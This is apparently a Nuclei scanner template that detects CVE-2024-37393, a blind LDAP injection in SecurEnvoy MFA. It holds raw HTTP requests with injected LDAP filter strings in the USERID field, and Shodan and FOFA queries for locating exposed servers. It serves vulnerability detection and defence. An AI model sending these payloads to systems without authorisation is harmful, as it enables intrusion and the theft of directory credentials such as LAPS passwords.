51 lines
1.7 KiB
YAML
51 lines
1.7 KiB
YAML
id: CVE-2024-37393
|
|
info:
|
|
name: SecurEnvoy Two Factor Authentication - LDAP Injection
|
|
author: securityforeveryone
|
|
severity: critical
|
|
description: |
|
|
Multiple LDAP injections vulnerabilities exist in SecurEnvoy MFA before 9.4.514 due to improper validation of user-supplied input. An unauthenticated remote attacker could exfiltrate data from Active Directory through blind LDAP injection attacks against the DESKTOP service exposed on the /secserver HTTP endpoint. This may include ms-Mcs-AdmPwd, which has a cleartext password for the Local Administrator Password Solution (LAPS) feature.
|
|
reference:
|
|
- https://www.tenable.com/cve/CVE-2024-37393
|
|
- https://www.optistream.io/blogs/tech/securenvoy-cve-2024-37393
|
|
- https://securenvoy.com
|
|
metadata:
|
|
verified: true
|
|
shodan-query: title:"SecurEnvoy"
|
|
fofa-query: title="SecurEnvoy"
|
|
tags: cve,cve2024,securenvoy,ldap
|
|
|
|
variables:
|
|
userid: "{{to_lower(rand_base(20))}}"
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /secserver/? HTTP/2
|
|
Host: {{Hostname}}
|
|
|
|
FLAG=DESKTOP
|
|
1
|
|
STATUS:INIT
|
|
USERID:{{userid}})(sAMAccountName=*
|
|
MEMBEROF:Domain Users
|
|
|
|
- |
|
|
POST /secserver/? HTTP/2
|
|
Host: {{Hostname}}
|
|
|
|
FLAG=DESKTOP
|
|
1
|
|
STATUS:INIT
|
|
USERID:*)(sAMAccountName=*
|
|
MEMBEROF:Domain Users
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- "contains(body_1, 'Error checking Group')"
|
|
- "status_code_1 == 200"
|
|
- "contains(body_2, 'GETPASSCODE')"
|
|
- "status_code_2 == 200"
|
|
condition: and
|
|
# digest: 490a0046304402207956ded5a27d1c12f6487316e5b14bb02bb6977fa43bc048e1a21ac9010125480220063cb9fbb223d773537cc685ba85640b97d10412c97695ac541f5ecbac760bbd:922c64590222798bb761d5b6d8e72950 |